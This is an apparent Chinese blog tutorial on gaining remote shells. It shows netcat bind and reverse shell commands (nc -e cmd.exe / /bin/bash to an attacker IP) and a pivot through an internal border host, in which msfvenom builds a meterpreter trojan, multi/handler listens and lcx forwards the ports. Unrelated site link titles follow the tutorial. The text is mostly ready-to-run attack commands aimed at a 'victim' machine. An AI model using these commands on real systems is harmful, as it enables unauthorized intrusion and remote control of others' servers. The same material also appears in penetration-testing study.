发布时间:2024-07-18 19:01
蚕吐丝,蜂酿蜜,人不学,不如物!
步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入)
nc -lvp 4444 -e cmd.exe (反弹windows shell)
nc -lvp 4444 -e /bin/bash (反弹linux shell)
步骤二:攻击机连接被控服务器的4444端口(攻击机输入)
nc -nv 受害机ip 4444
2利用nc反弹shell
条件:防火墙开启,不允许访问目标端口(可直接关闭目标机防火墙,权限不够时利用nc反向连接)
方式:tcp连接是被控服务器发起,连接外网攻击机
步骤一:外网服务器监听4444端口
(攻击机输入)
nc -lvp 4444
步骤二:在被控服务器反弹shell到外网服务器的4444端口
(受害机输入)
nc -e cmd.exe 攻击机ip 4444(反弹windows shell)
nc -e /bin/bash 攻击机ip 4444(反弹linux shell)
网络配置情况
内网边界机2有两个网卡,一个与攻击机1同网段,一个与目标服务器3同网段(攻击机1的ip:192.168.16.130,内网边界机2的ip:192.168.16.129和10.1.1.1,目标服务器3的ip:10.1.1.2)此时1-2,2-3通,1-3不通
环境
有时我们无法直接访问目标服务器,也就无法反弹shell,此时就需要一个内网的边缘机来进行转发端口,通过这个转发的端口再进行反弹shell
使用方法
1.攻击机输入msfconsole打开msf(msf具体使用见上面链接),选择合适的payload:windows/meterpreter/reverse_tcp
2.选择此payload,并制作对应的木马
选择payload:
use windows/meterpreter/reverse_tcp
制作木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.1.1.1(内网边界机2的内网ip) lport=12345(端口) -o 111.exe
3.上传111.exe到目标服务器3
4.攻击机1开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.16.130(本机ip)
set lport 4444
exploit
5.内网边界机2输入命令将12345端口转发到攻击机1的4444端口
lcx -tran 12345 192.168.16.130 4444
6.目标服务器3运行111.exe将1234端口发送到内网边界机2,再由内网边界机2将1234端口转发成4444端口发送给攻击机1,攻击机1就会接收到目标服务器3的shell
参考链接:https://blog.csdn.net/wsnbbz/article/details/104893482
其他:
linux设置屏幕分辨率:xrandr --size 1920x1200
Nmap判断操作系统: nmap -A ip
【BDTC 2018】PingCAP申砾:做一个真正通用的数据库产品
用rust写lisp解释器2 (实现一个简单的异步模型(channel + thread => go))
边无际 Shifu IoT 开源开发框架 助力物联网应用开发加速十倍
RuntimeError: one of the variables needed for gradient computation has been modified by an inplace
Go结构体SliceHeader及StringHeader作用详解
一个正整数有可能可以被表示为n(n>=2)个连续正整数之和(Java)
Spring Cloud Gateway源码解析-10-自定义Predicate实现黑名单